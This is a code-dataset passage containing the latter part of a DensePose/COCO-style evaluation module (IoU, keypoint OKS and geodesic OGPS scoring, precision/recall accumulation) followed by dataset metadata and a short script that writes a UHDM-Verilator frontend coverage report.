dt = [_ for cId in p.catIds for _ in self._dts[imgId, cId]]
if len(gt) == 0 and len(dt) == 0:
return []
inds = np.argsort([-d["score"] for d in dt], kind="mergesort")
dt = [dt[i] for i in inds]
if len(dt) > p.maxDets[-1]:
dt = dt[0 : p.maxDets[-1]]
gtmasks = []
for g in gt:
if DensePoseDataRelative.S_KEY in g:
# convert DensePose mask to a binary mask
mask = np.minimum(self.getDensePoseMask(g[DensePoseDataRelative.S_KEY]), 1.0)
_, _, w, h = g["bbox"]
scale_x = float(max(w, 1)) / mask.shape[1]
scale_y = float(max(h, 1)) / mask.shape[0]
mask = spzoom(mask, (scale_y, scale_x), order=1, prefilter=False)
mask = np.array(mask > 0.5, dtype=np.uint8)
rle_mask = self._generate_rlemask_on_image(mask, imgId, g)
elif "segmentation" in g:
segmentation = g["segmentation"]
if isinstance(segmentation, list) and segmentation:
# polygons
im_h, im_w = self.size_mapping[imgId]
rles = maskUtils.frPyObjects(segmentation, im_h, im_w)
rle_mask = maskUtils.merge(rles)
elif isinstance(segmentation, dict):
if isinstance(segmentation["counts"], list):
# uncompressed RLE
im_h, im_w = self.size_mapping[imgId]
rle_mask = maskUtils.frPyObjects(segmentation, im_h, im_w)
else:
# compressed RLE
rle_mask = segmentation
else:
rle_mask = self._generate_rlemask_on_image(None, imgId, g)
else:
rle_mask = self._generate_rlemask_on_image(None, imgId, g)
gtmasks.append(rle_mask)
dtmasks = []
for d in dt:
mask = self._extract_mask(d)
mask = np.require(np.asarray(mask > 0), dtype=np.uint8, requirements=["F"])
rle_mask = self._generate_rlemask_on_image(mask, imgId, d)
dtmasks.append(rle_mask)
# # Debug: COCO RLE --> tensor
# pdb.set_trace()
# import pycocotools.mask as mask_util
# import imageio
# for ii in range(len(gtmasks)):
# imageio.imwrite("tmp/gtmasks_{}.png".format(ii), mask_util.decode(gtmasks[ii]).astype(np.float))
# for ii in range(len(dtmasks)):
# imageio.imwrite("tmp/dtmasks_{}.png".format(ii), mask_util.decode(dtmasks[ii]).astype(np.float))
# compute iou between each dt and gt region
iscrowd = [int(o.get("iscrowd", 0)) for o in gt]
iousDP = maskUtils.iou(dtmasks, gtmasks, iscrowd)
return iousDP
def computeIoU(self, imgId, catId):
p = self.params
if p.useCats:
gt = self._gts[imgId, catId]
dt = self._dts[imgId, catId]
else:
gt = [_ for cId in p.catIds for _ in self._gts[imgId, cId]]
dt = [_ for cId in p.catIds for _ in self._dts[imgId, cId]]
if len(gt) == 0 and len(dt) == 0:
return []
inds = np.argsort([-d["score"] for d in dt], kind="mergesort")
dt = [dt[i] for i in inds]
if len(dt) > p.maxDets[-1]:
dt = dt[0 : p.maxDets[-1]]
if p.iouType == "segm":
g = [g["segmentation"] for g in gt if g["segmentation"] is not None]
d = [d["segmentation"] for d in dt if d["segmentation"] is not None]
elif p.iouType == "bbox":
g = [g["bbox"] for g in gt]
d = [d["bbox"] for d in dt]
else:
raise Exception("unknown iouType for iou computation")
# compute iou between each dt and gt region
iscrowd = [int(o.get("iscrowd", 0)) for o in gt]
ious = maskUtils.iou(d, g, iscrowd)
# # Debug: COCO RLE --> tensor
# import pycocotools.mask as mask_util
# import imageio
# for ii in range(len(g)):
# imageio.imwrite("tmp/g_mask_{}.png".format(ii), mask_util.decode(g[ii]).astype(np.float))
# for ii in range(len(d)):
# imageio.imwrite("tmp/d_mask_{}.png".format(ii), mask_util.decode(d[ii]).astype(np.float))
# pdb.set_trace()
return ious
def computeOks(self, imgId, catId):
p = self.params
# dimension here should be Nxm
gts = self._gts[imgId, catId]
dts = self._dts[imgId, catId]
inds = np.argsort([-d["score"] for d in dts], kind="mergesort")
dts = [dts[i] for i in inds]
if len(dts) > p.maxDets[-1]:
dts = dts[0 : p.maxDets[-1]]
# if len(gts) == 0 and len(dts) == 0:
if len(gts) == 0 or len(dts) == 0:
return []
ious = np.zeros((len(dts), len(gts)))
sigmas = (
np.array(
[
0.26,
0.25,
0.25,
0.35,
0.35,
0.79,
0.79,
0.72,
0.72,
0.62,
0.62,
1.07,
1.07,
0.87,
0.87,
0.89,
0.89,
]
)
/ 10.0
)
vars = (sigmas * 2) ** 2
k = len(sigmas)
# compute oks between each detection and ground truth object
for j, gt in enumerate(gts):
# create bounds for ignore regions(double the gt bbox)
g = np.array(gt["keypoints"])
xg = g[0::3]
yg = g[1::3]
vg = g[2::3]
k1 = np.count_nonzero(vg > 0)
bb = gt["bbox"]
x0 = bb[0] - bb[2]
x1 = bb[0] + bb[2] * 2
y0 = bb[1] - bb[3]
y1 = bb[1] + bb[3] * 2
for i, dt in enumerate(dts):
d = np.array(dt["keypoints"])
xd = d[0::3]
yd = d[1::3]
if k1 > 0:
# measure the per-keypoint distance if keypoints visible
dx = xd - xg
dy = yd - yg
else:
# measure minimum distance to keypoints in (x0,y0) & (x1,y1)
z = np.zeros(k)
dx = np.max((z, x0 - xd), axis=0) + np.max((z, xd - x1), axis=0)
dy = np.max((z, y0 - yd), axis=0) + np.max((z, yd - y1), axis=0)
e = (dx ** 2 + dy ** 2) / vars / (gt["area"] + np.spacing(1)) / 2
if k1 > 0:
e = e[vg > 0]
ious[i, j] = np.sum(np.exp(-e)) / e.shape[0]
return ious
def _extract_mask(self, dt: Dict[str, Any]) -> np.ndarray:
if "densepose" in dt:
densepose_results_quantized = dt["densepose"]
return densepose_results_quantized.labels_uv_uint8[0].numpy()
elif "cse_mask" in dt:
return dt["cse_mask"]
def _extract_iuv(
self, densepose_data: np.ndarray, py: np.ndarray, px: np.ndarray, gt: Dict[str, Any]
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Extract arrays of I, U and V values at given points as numpy arrays
given the data mode stored in self._dpDataMode
"""
if self._dpDataMode == DensePoseDataMode.IUV_DT:
# estimated labels and UV (default)
ipoints = densepose_data[0, py, px]
upoints = densepose_data[1, py, px] / 255.0 # convert from uint8 by /255.
vpoints = densepose_data[2, py, px] / 255.0
elif self._dpDataMode == DensePoseDataMode.IUV_GT:
# ground truth
ipoints = np.array(gt["dp_I"])
upoints = np.array(gt["dp_U"])
vpoints = np.array(gt["dp_V"])
elif self._dpDataMode == DensePoseDataMode.I_GT_UV_0:
# ground truth labels, UV = 0
ipoints = np.array(gt["dp_I"])
upoints = upoints * 0.0
vpoints = vpoints * 0.0
elif self._dpDataMode == DensePoseDataMode.I_GT_UV_DT:
# ground truth labels, estimated UV
ipoints = np.array(gt["dp_I"])
upoints = densepose_data[1, py, px] / 255.0 # convert from uint8 by /255.
vpoints = densepose_data[2, py, px] / 255.0
elif self._dpDataMode == DensePoseDataMode.I_DT_UV_0:
# estimated labels, UV = 0
ipoints = densepose_data[0, py, px]
upoints = upoints * 0.0
vpoints = vpoints * 0.0
else:
raise ValueError(f"Unknown data mode: {self._dpDataMode}")
return ipoints, upoints, vpoints
def computeOgps(self, imgId, catId):
p = self.params
# dimension here should be Nxm
g = self._gts[imgId, catId]
d = self._dts[imgId, catId]
inds = np.argsort([-d_["score"] for d_ in d], kind="mergesort")
d = [d[i] for i in inds]
if len(d) > p.maxDets[-1]:
d = d[0 : p.maxDets[-1]]
# if len(gts) == 0 and len(dts) == 0:
if len(g) == 0 or len(d) == 0:
return []
ious = np.zeros((len(d), len(g)))
# compute opgs between each detection and ground truth object
# sigma = self.sigma #0.255 # dist = 0.3m corresponds to ogps = 0.5
# 1 # dist = 0.3m corresponds to ogps = 0.96
# 1.45 # dist = 1.7m (person height) corresponds to ogps = 0.5)
for j, gt in enumerate(g):
if not gt["ignore"]:
g_ = gt["bbox"]
for i, dt in enumerate(d):
#
dy = int(dt["bbox"][3])
dx = int(dt["bbox"][2])
dp_x = np.array(gt["dp_x"]) * g_[2] / 255.0
dp_y = np.array(gt["dp_y"]) * g_[3] / 255.0
py = (dp_y + g_[1] - dt["bbox"][1]).astype(np.int)
px = (dp_x + g_[0] - dt["bbox"][0]).astype(np.int)
#
pts = np.zeros(len(px))
pts[px >= dx] = -1
pts[py >= dy] = -1
pts[px < 0] = -1
pts[py < 0] = -1
if len(pts) < 1:
ogps = 0.0
elif np.max(pts) == -1:
ogps = 0.0
else:
px[pts == -1] = 0
py[pts == -1] = 0
# Find closest vertices in subsampled mesh.
if "densepose" in dt:
cVertsGT, ClosestVertsGTTransformed = self.findAllClosestVertsGT(gt)
densepose_results_quantized = dt["densepose"]
ipoints, upoints, vpoints = self._extract_iuv(
densepose_results_quantized.labels_uv_uint8.numpy(), py, px, gt
)
ipoints[pts == -1] = 0
cVerts = self.findAllClosestVertsUV(upoints, vpoints, ipoints)
# Get pairwise geodesic distances between gt and estimated mesh points.
dist = self.getDistancesUV(ClosestVertsGTTransformed, cVerts)
# Compute the Ogps measure.
# Find the mean geodesic normalization distance for
# each GT point, based on which part it is on.
Current_Mean_Distances = self.Mean_Distances[
self.CoarseParts[
self.Part_ids[cVertsGT[cVertsGT > 0].astype(int) - 1]
]
]
elif "cse_indices" in dt:
cVertsGT = np.array(gt["dp_vertex"])
cse_mask, cse_indices = dt["cse_mask"], dt["cse_indices"]
cVerts = self.findAllClosestVertsCSE(
cse_indices[py, px],
cse_mask[py, px],
)
# Get pairwise geodesic distances between gt and estimated mesh points.
dist = self.getDistancesCSE(cVertsGT, cVerts, gt["ref_model"])
Current_Mean_Distances = self.Mean_Distances[
self.CoarseParts[np.array(gt["dp_I"], dtype=int)]
]
# Compute gps
ogps_values = np.exp(-(dist ** 2) / (2 * (Current_Mean_Distances ** 2)))
#
if len(dist) > 0:
ogps = np.sum(ogps_values) / len(dist)
ious[i, j] = ogps
gbb = [gt["bbox"] for gt in g]
dbb = [dt["bbox"] for dt in d]
# compute iou between each dt and gt region
iscrowd = [int(o.get("iscrowd", 0)) for o in g]
ious_bb = maskUtils.iou(dbb, gbb, iscrowd)
return ious, ious_bb
def evaluateImg(self, imgId, catId, aRng, maxDet):
"""
perform evaluation for single category and image
:return: dict (single image results)
"""
p = self.params
if p.useCats:
gt = self._gts[imgId, catId]
dt = self._dts[imgId, catId]
else:
gt = [_ for cId in p.catIds for _ in self._gts[imgId, cId]]
dt = [_ for cId in p.catIds for _ in self._dts[imgId, cId]]
if len(gt) == 0 and len(dt) == 0:
return None
for g in gt:
# g['_ignore'] = g['ignore']
if g["ignore"] or (g["area"] < aRng[0] or g["area"] > aRng[1]):
g["_ignore"] = True
else:
g["_ignore"] = False
# sort dt highest score first, sort gt ignore last
gtind = np.argsort([g["_ignore"] for g in gt], kind="mergesort")
gt = [gt[i] for i in gtind]
dtind = np.argsort([-d["score"] for d in dt], kind="mergesort")
dt = [dt[i] for i in dtind[0:maxDet]]
iscrowd = [int(o.get("iscrowd", 0)) for o in gt]
# load computed ious
if p.iouType == "densepose":
# print('Checking the length', len(self.ious[imgId, catId]))
# if len(self.ious[imgId, catId]) == 0:
# print(self.ious[imgId, catId])
ious = (
self.ious[imgId, catId][0][:, gtind]
if len(self.ious[imgId, catId]) > 0
else self.ious[imgId, catId]
)
ioubs = (
self.ious[imgId, catId][1][:, gtind]
if len(self.ious[imgId, catId]) > 0
else self.ious[imgId, catId]
)
if self._dpEvalMode == DensePoseEvalMode.GPSM:
iousM = (
self.real_ious[imgId, catId][:, gtind]
if len(self.real_ious[imgId, catId]) > 0
else self.real_ious[imgId, catId]
)
else:
ious = (
self.ious[imgId, catId][:, gtind]
if len(self.ious[imgId, catId]) > 0
else self.ious[imgId, catId]
)
T = len(p.iouThrs)
G = len(gt)
D = len(dt)
gtm = np.zeros((T, G))
dtm = np.zeros((T, D))
gtIg = np.array([g["_ignore"] for g in gt])
dtIg = np.zeros((T, D))
if np.all(gtIg) and p.iouType == "densepose":
dtIg = np.logical_or(dtIg, True)
if len(ious) > 0: # and not p.iouType == 'densepose':
for tind, t in enumerate(p.iouThrs):
for dind, d in enumerate(dt):
# information about best match so far (m=-1 -> unmatched)
iou = min([t, 1 - 1e-10])
m = -1
for gind, _g in enumerate(gt):
# if this gt already matched, and not a crowd, continue
if gtm[tind, gind] > 0 and not iscrowd[gind]:
continue
# if dt matched to reg gt, and on ignore gt, stop
if m > -1 and gtIg[m] == 0 and gtIg[gind] == 1:
break
if p.iouType == "densepose":
if self._dpEvalMode == DensePoseEvalMode.GPSM:
new_iou = np.sqrt(iousM[dind, gind] * ious[dind, gind])
elif self._dpEvalMode == DensePoseEvalMode.IOU:
new_iou = iousM[dind, gind]
elif self._dpEvalMode == DensePoseEvalMode.GPS:
new_iou = ious[dind, gind]
else:
new_iou = ious[dind, gind]
if new_iou < iou:
continue
if new_iou == 0.0:
continue
# if match successful and best so far, store appropriately
iou = new_iou
m = gind
# if match made store id of match for both dt and gt
if m == -1:
continue
dtIg[tind, dind] = gtIg[m]
dtm[tind, dind] = gt[m]["id"]
gtm[tind, m] = d["id"]
if p.iouType == "densepose":
if not len(ioubs) == 0:
for dind, d in enumerate(dt):
# information about best match so far (m=-1 -> unmatched)
if dtm[tind, dind] == 0:
ioub = 0.8
m = -1
for gind, _g in enumerate(gt):
# if this gt already matched, and not a crowd, continue
if gtm[tind, gind] > 0 and not iscrowd[gind]:
continue
# continue to next gt unless better match made
if ioubs[dind, gind] < ioub:
continue
# if match successful and best so far, store appropriately
ioub = ioubs[dind, gind]
m = gind
# if match made store id of match for both dt and gt
if m > -1:
dtIg[:, dind] = gtIg[m]
if gtIg[m]:
dtm[tind, dind] = gt[m]["id"]
gtm[tind, m] = d["id"]
# set unmatched detections outside of area range to ignore
a = np.array([d["area"] < aRng[0] or d["area"] > aRng[1] for d in dt]).reshape((1, len(dt)))
dtIg = np.logical_or(dtIg, np.logical_and(dtm == 0, np.repeat(a, T, 0)))
# store results for given image and category
# print('Done with the function', len(self.ious[imgId, catId]))
return {
"image_id": imgId,
"category_id": catId,
"aRng": aRng,
"maxDet": maxDet,
"dtIds": [d["id"] for d in dt],
"gtIds": [g["id"] for g in gt],
"dtMatches": dtm,
"gtMatches": gtm,
"dtScores": [d["score"] for d in dt],
"gtIgnore": gtIg,
"dtIgnore": dtIg,
}
def accumulate(self, p=None):
"""
Accumulate per image evaluation results and store the result in self.eval
:param p: input params for evaluation
:return: None
"""
logger.info("Accumulating evaluation results...")
tic = time.time()
if not self.evalImgs:
logger.info("Please run evaluate() first")
# allows input customized parameters
if p is None:
p = self.params
p.catIds = p.catIds if p.useCats == 1 else [-1]
T = len(p.iouThrs)
R = len(p.recThrs)
K = len(p.catIds) if p.useCats else 1
A = len(p.areaRng)
M = len(p.maxDets)
precision = -(np.ones((T, R, K, A, M))) # -1 for the precision of absent categories
recall = -(np.ones((T, K, A, M)))
# create dictionary for future indexing
logger.info("Categories: {}".format(p.catIds))
_pe = self._paramsEval
catIds = _pe.catIds if _pe.useCats else [-1]
setK = set(catIds)
setA = set(map(tuple, _pe.areaRng))
setM = set(_pe.maxDets)
setI = set(_pe.imgIds)
# get inds to evaluate
k_list = [n for n, k in enumerate(p.catIds) if k in setK]
m_list = [m for n, m in enumerate(p.maxDets) if m in setM]
a_list = [n for n, a in enumerate(map(lambda x: tuple(x), p.areaRng)) if a in setA]
i_list = [n for n, i in enumerate(p.imgIds) if i in setI]
I0 = len(_pe.imgIds)
A0 = len(_pe.areaRng)
# retrieve E at each category, area range, and max number of detections
for k, k0 in enumerate(k_list):
Nk = k0 * A0 * I0
for a, a0 in enumerate(a_list):
Na = a0 * I0
for m, maxDet in enumerate(m_list):
E = [self.evalImgs[Nk + Na + i] for i in i_list]
E = [e for e in E if e is not None]
if len(E) == 0:
continue
dtScores = np.concatenate([e["dtScores"][0:maxDet] for e in E])
# different sorting method generates slightly different results.
# mergesort is used to be consistent as Matlab implementation.
inds = np.argsort(-dtScores, kind="mergesort")
dtm = np.concatenate([e["dtMatches"][:, 0:maxDet] for e in E], axis=1)[:, inds]
dtIg = np.concatenate([e["dtIgnore"][:, 0:maxDet] for e in E], axis=1)[:, inds]
gtIg = np.concatenate([e["gtIgnore"] for e in E])
npig = np.count_nonzero(gtIg == 0)
if npig == 0:
continue
tps = np.logical_and(dtm, np.logical_not(dtIg))
fps = np.logical_and(np.logical_not(dtm), np.logical_not(dtIg))
tp_sum = np.cumsum(tps, axis=1).astype(dtype=np.float)
fp_sum = np.cumsum(fps, axis=1).astype(dtype=np.float)
for t, (tp, fp) in enumerate(zip(tp_sum, fp_sum)):
tp = np.array(tp)
fp = np.array(fp)
nd = len(tp)
rc = tp / npig
pr = tp / (fp + tp + np.spacing(1))
q = np.zeros((R,))
if nd:
recall[t, k, a, m] = rc[-1]
else:
recall[t, k, a, m] = 0
# numpy is slow without cython optimization for accessing elements
# use python array gets significant speed improvement
pr = pr.tolist()
q = q.tolist()
for i in range(nd - 1, 0, -1):
if pr[i] > pr[i - 1]:
pr[i - 1] = pr[i]
inds = np.searchsorted(rc, p.recThrs, side="left")
try:
for ri, pi in enumerate(inds):
q[ri] = pr[pi]
except Exception:
pass
precision[t, :, k, a, m] = np.array(q)
logger.info(
"Final: max precision {}, min precision {}".format(np.max(precision), np.min(precision))
)
self.eval = {
"params": p,
"counts": [T, R, K, A, M],
"date": datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"precision": precision,
"recall": recall,
}
toc = time.time()
logger.info("DONE (t={:0.2f}s).".format(toc - tic))
def summarize(self):
"""
Compute and display summary metrics for evaluation results.
Note this function can *only* be applied on the default parameter setting
"""
def _summarize(ap=1, iouThr=None, areaRng="all", maxDets=100):
p = self.params
iStr = " {:<18} {} @[ {}={:<9} | area={:>6s} | maxDets={:>3d} ] = {:0.3f}"
titleStr = "Average Precision" if ap == 1 else "Average Recall"
typeStr = "(AP)" if ap == 1 else "(AR)"
measure = "IoU"
if self.params.iouType == "keypoints":
measure = "OKS"
elif self.params.iouType == "densepose":
measure = "OGPS"
iouStr = (
"{:0.2f}:{:0.2f}".format(p.iouThrs[0], p.iouThrs[-1])
if iouThr is None
else "{:0.2f}".format(iouThr)
)
aind = [i for i, aRng in enumerate(p.areaRngLbl) if aRng == areaRng]
mind = [i for i, mDet in enumerate(p.maxDets) if mDet == maxDets]
if ap == 1:
# dimension of precision: [TxRxKxAxM]
s = self.eval["precision"]
# IoU
if iouThr is not None:
t = np.where(np.abs(iouThr - p.iouThrs) < 0.001)[0]
s = s[t]
s = s[:, :, :, aind, mind]
else:
# dimension of recall: [TxKxAxM]
s = self.eval["recall"]
if iouThr is not None:
t = np.where(np.abs(iouThr - p.iouThrs) < 0.001)[0]
s = s[t]
s = s[:, :, aind, mind]
if len(s[s > -1]) == 0:
mean_s = -1
else:
mean_s = np.mean(s[s > -1])
logger.info(iStr.format(titleStr, typeStr, measure, iouStr, areaRng, maxDets, mean_s))
return mean_s
def _summarizeDets():
stats = np.zeros((12,))
stats[0] = _summarize(1)
stats[1] = _summarize(1, iouThr=0.5, maxDets=self.params.maxDets[2])
stats[2] = _summarize(1, iouThr=0.75, maxDets=self.params.maxDets[2])
stats[3] = _summarize(1, areaRng="small", maxDets=self.params.maxDets[2])
stats[4] = _summarize(1, areaRng="medium", maxDets=self.params.maxDets[2])
stats[5] = _summarize(1, areaRng="large", maxDets=self.params.maxDets[2])
stats[6] = _summarize(0, maxDets=self.params.maxDets[0])
stats[7] = _summarize(0, maxDets=self.params.maxDets[1])
stats[8] = _summarize(0, maxDets=self.params.maxDets[2])
stats[9] = _summarize(0, areaRng="small", maxDets=self.params.maxDets[2])
stats[10] = _summarize(0, areaRng="medium", maxDets=self.params.maxDets[2])
stats[11] = _summarize(0, areaRng="large", maxDets=self.params.maxDets[2])
return stats
def _summarizeKps():
stats = np.zeros((10,))
stats[0] = _summarize(1, maxDets=20)
stats[1] = _summarize(1, maxDets=20, iouThr=0.5)
stats[2] = _summarize(1, maxDets=20, iouThr=0.75)
stats[3] = _summarize(1, maxDets=20, areaRng="medium")
stats[4] = _summarize(1, maxDets=20, areaRng="large")
stats[5] = _summarize(0, maxDets=20)
stats[6] = _summarize(0, maxDets=20, iouThr=0.5)
stats[7] = _summarize(0, maxDets=20, iouThr=0.75)
stats[8] = _summarize(0, maxDets=20, areaRng="medium")
stats[9] = _summarize(0, maxDets=20, areaRng="large")
return stats
def _summarizeUvs():
stats = [_summarize(1, maxDets=self.params.maxDets[0])]
min_threshold = self.params.iouThrs.min()
if min_threshold <= 0.201:
stats += [_summarize(1, maxDets=self.params.maxDets[0], iouThr=0.2)]
if min_threshold <= 0.301:
stats += [_summarize(1, maxDets=self.params.maxDets[0], iouThr=0.3)]
if min_threshold <= 0.401:
stats += [_summarize(1, maxDets=self.params.maxDets[0], iouThr=0.4)]
stats += [
_summarize(1, maxDets=self.params.maxDets[0], iouThr=0.5),
_summarize(1, maxDets=self.params.maxDets[0], iouThr=0.75),
_summarize(1, maxDets=self.params.maxDets[0], areaRng="medium"),
_summarize(1, maxDets=self.params.maxDets[0], areaRng="large"),
_summarize(0, maxDets=self.params.maxDets[0]),
_summarize(0, maxDets=self.params.maxDets[0], iouThr=0.5),
_summarize(0, maxDets=self.params.maxDets[0], iouThr=0.75),
_summarize(0, maxDets=self.params.maxDets[0], areaRng="medium"),
_summarize(0, maxDets=self.params.maxDets[0], areaRng="large"),
]
return np.array(stats)
def _summarizeUvsOld():
stats = np.zeros((18,))
stats[0] = _summarize(1, maxDets=self.params.maxDets[0])
stats[1] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.5)
stats[2] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.55)
stats[3] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.60)
stats[4] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.65)
stats[5] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.70)
stats[6] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.75)
stats[7] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.80)
stats[8] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.85)
stats[9] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.90)
stats[10] = _summarize(1, maxDets=self.params.maxDets[0], iouThr=0.95)
stats[11] = _summarize(1, maxDets=self.params.maxDets[0], areaRng="medium")
stats[12] = _summarize(1, maxDets=self.params.maxDets[0], areaRng="large")
stats[13] = _summarize(0, maxDets=self.params.maxDets[0])
stats[14] = _summarize(0, maxDets=self.params.maxDets[0], iouThr=0.5)
stats[15] = _summarize(0, maxDets=self.params.maxDets[0], iouThr=0.75)
stats[16] = _summarize(0, maxDets=self.params.maxDets[0], areaRng="medium")
stats[17] = _summarize(0, maxDets=self.params.maxDets[0], areaRng="large")
return stats
if not self.eval:
raise Exception("Please run accumulate() first")
iouType = self.params.iouType
if iouType in ["segm", "bbox"]:
summarize = _summarizeDets
elif iouType in ["keypoints"]:
summarize = _summarizeKps
elif iouType in ["densepose"]:
summarize = _summarizeUvs
self.stats = summarize()
def __str__(self):
self.summarize()
# ================ functions for dense pose ==============================
def findAllClosestVertsUV(self, U_points, V_points, Index_points):
ClosestVerts = np.ones(Index_points.shape) * -1
for i in np.arange(24):
#
if (i + 1) in Index_points:
UVs = np.array(
[U_points[Index_points == (i + 1)], V_points[Index_points == (i + 1)]]
)
Current_Part_UVs = self.Part_UVs[i]
Current_Part_ClosestVertInds = self.Part_ClosestVertInds[i]
D = ssd.cdist(Current_Part_UVs.transpose(), UVs.transpose()).squeeze()
ClosestVerts[Index_points == (i + 1)] = Current_Part_ClosestVertInds[
np.argmin(D, axis=0)
]
ClosestVertsTransformed = self.PDIST_transform[ClosestVerts.astype(int) - 1]
ClosestVertsTransformed[ClosestVerts < 0] = 0
return ClosestVertsTransformed
def findAllClosestVertsCSE(self, cse_indices, mask):
ClosestVerts = np.ones(cse_indices.shape) * -1
ClosestVerts[mask == 1] = cse_indices[mask == 1]
return ClosestVerts
def findAllClosestVertsGT(self, gt):
#
I_gt = np.array(gt["dp_I"])
U_gt = np.array(gt["dp_U"])
V_gt = np.array(gt["dp_V"])
#
# print(I_gt)
#
ClosestVertsGT = np.ones(I_gt.shape) * -1
for i in np.arange(24):
if (i + 1) in I_gt:
UVs = np.array([U_gt[I_gt == (i + 1)], V_gt[I_gt == (i + 1)]])
Current_Part_UVs = self.Part_UVs[i]
Current_Part_ClosestVertInds = self.Part_ClosestVertInds[i]
D = ssd.cdist(Current_Part_UVs.transpose(), UVs.transpose()).squeeze()
ClosestVertsGT[I_gt == (i + 1)] = Current_Part_ClosestVertInds[np.argmin(D, axis=0)]
#
ClosestVertsGTTransformed = self.PDIST_transform[ClosestVertsGT.astype(int) - 1]
ClosestVertsGTTransformed[ClosestVertsGT < 0] = 0
return ClosestVertsGT, ClosestVertsGTTransformed
def getDistancesCSE(self, cVertsGT, cVerts, mesh_name):
geodists_vertices = np.ones(len(cVertsGT)) * np.inf
mask = (cVertsGT >= 0) * (cVerts >= 0)
mesh = create_mesh(mesh_name, "cpu")
geodists_vertices[mask] = mesh.geodists[cVertsGT[mask], cVerts[mask]]
return geodists_vertices
def getDistancesUV(self, cVertsGT, cVerts):
#
n = 27554
dists = []
for d in range(len(cVertsGT)):
if cVertsGT[d] > 0:
if cVerts[d] > 0:
i = cVertsGT[d] - 1
j = cVerts[d] - 1
if j == i:
dists.append(0)
elif j > i:
ccc = i
i = j
j = ccc
i = n - i - 1
j = n - j - 1
k = (n * (n - 1) / 2) - (n - i) * ((n - i) - 1) / 2 + j - i - 1
k = (n * n - n) / 2 - k - 1
dists.append(self.Pdist_matrix[int(k)][0])
else:
i = n - i - 1
j = n - j - 1
k = (n * (n - 1) / 2) - (n - i) * ((n - i) - 1) / 2 + j - i - 1
k = (n * n - n) / 2 - k - 1
dists.append(self.Pdist_matrix[int(k)][0])
else:
dists.append(np.inf)
return np.atleast_1d(np.array(dists).squeeze())
class Params:
"""
Params for coco evaluation api
"""
def setDetParams(self):
self.imgIds = []
self.catIds = []
# np.arange causes trouble. the data point on arange is slightly larger than the true value
self.iouThrs = np.linspace(0.5, 0.95, int(np.round((0.95 - 0.5) / 0.05)) + 1, endpoint=True)
self.recThrs = np.linspace(0.0, 1.00, int(np.round((1.00 - 0.0) / 0.01)) + 1, endpoint=True)
self.maxDets = [1, 10, 100]
self.areaRng = [
[0 ** 2, 1e5 ** 2],
[0 ** 2, 32 ** 2],
[32 ** 2, 96 ** 2],
[96 ** 2, 1e5 ** 2],
]
self.areaRngLbl = ["all", "small", "medium", "large"]
self.useCats = 1
def setKpParams(self):
self.imgIds = []
self.catIds = []
# np.arange causes trouble. the data point on arange is slightly larger than the true value
self.iouThrs = np.linspace(0.5, 0.95, np.round((0.95 - 0.5) / 0.05) + 1, endpoint=True)
self.recThrs = np.linspace(0.0, 1.00, np.round((1.00 - 0.0) / 0.01) + 1, endpoint=True)
self.maxDets = [20]
self.areaRng = [[0 ** 2, 1e5 ** 2], [32 ** 2, 96 ** 2], [96 ** 2, 1e5 ** 2]]
self.areaRngLbl = ["all", "medium", "large"]
self.useCats = 1
def setUvParams(self):
self.imgIds = []
self.catIds = []
self.iouThrs = np.linspace(0.5, 0.95, int(np.round((0.95 - 0.5) / 0.05)) + 1, endpoint=True)
self.recThrs = np.linspace(0.0, 1.00, int(np.round((1.00 - 0.0) / 0.01)) + 1, endpoint=True)
self.maxDets = [20]
self.areaRng = [[0 ** 2, 1e5 ** 2], [32 ** 2, 96 ** 2], [96 ** 2, 1e5 ** 2]]
self.areaRngLbl = ["all", "medium", "large"]
self.useCats = 1
def __init__(self, iouType="segm"):
if iouType == "segm" or iouType == "bbox":
self.setDetParams()
elif iouType == "keypoints":
self.setKpParams()
elif iouType == "densepose":
self.setUvParams()
else:
raise Exception("iouType not supported")
self.iouType = iouType
# useSegm is deprecated
self.useSegm = None
| 43.94398 | 110 | 0.512206 |
79545221add94b78078f5e419af1cd5aa3a5676d | 1,501 | py | Python | gen_coverage_report.py | umarcor/uhdm-integration | 5f3e5092cc912bed131b4b6328eef5537fec30e7 | [
"Apache-2.0"
] | 19 | 2020-07-27T08:07:13.000Z | 2021-06-22T20:10:04.000Z | gen_coverage_report.py | umarcor/uhdm-integration | 5f3e5092cc912bed131b4b6328eef5537fec30e7 | [
"Apache-2.0"
] | 214 | 2021-06-23T09:30:10.000Z | 2022-02-23T15:15:48.000Z | gen_coverage_report.py | umarcor/uhdm-integration | 5f3e5092cc912bed131b4b6328eef5537fec30e7 | [
"Apache-2.0"
] | 4 | 2020-04-21T17:06:23.000Z | 2020-11-04T09:03:49.000Z | import argparse
parser = argparse.ArgumentParser(description="Generate HTML coverage report "
"for UHDM-Verilator frontend")
parser.add_argument('--verilator-uhdm', action='store', dest='verilator_report')
parser.add_argument('--output-file', action='store', dest='output_file')
args = parser.parse_args()
present_in_uhdm = set()
visited_by_frontend = set()
with open(args.verilator_report, 'r') as f:
target = present_in_uhdm
for line in f:
if line == "UHDM contents:\n":
target = present_in_uhdm
elif line == "Visited nodes:\n":
target = visited_by_frontend
else:
target.add(line)
with open(args.output_file, 'w') as outfile:
not_visited = present_in_uhdm - visited_by_frontend
arranged = sorted(not_visited)
outfile.write(''.join(arranged))
outfile.write("Present in UHDM: " + str(len(present_in_uhdm)) + '\n')
outfile.write("Visited: " + str(len(visited_by_frontend)) + '\n')
outfile.write("Overall coverage: " + str(len(visited_by_frontend)/len(present_in_uhdm)*100) + "%\n")
outfile.write("\nMissing node count per type:\n")
types = set()
missed_nodes = dict()
for node in not_visited:
node_type = node.split(':')[-1][:-1]
types.add(node_type)
missed_nodes[node_type] = missed_nodes.get(node_type, 0) + 1
for t in types:
outfile.write(" Type: " + str(t) + "\tCount: " + str(missed_nodes[t]) + '\n')
| 37.525 | 104 | 0.637575 |
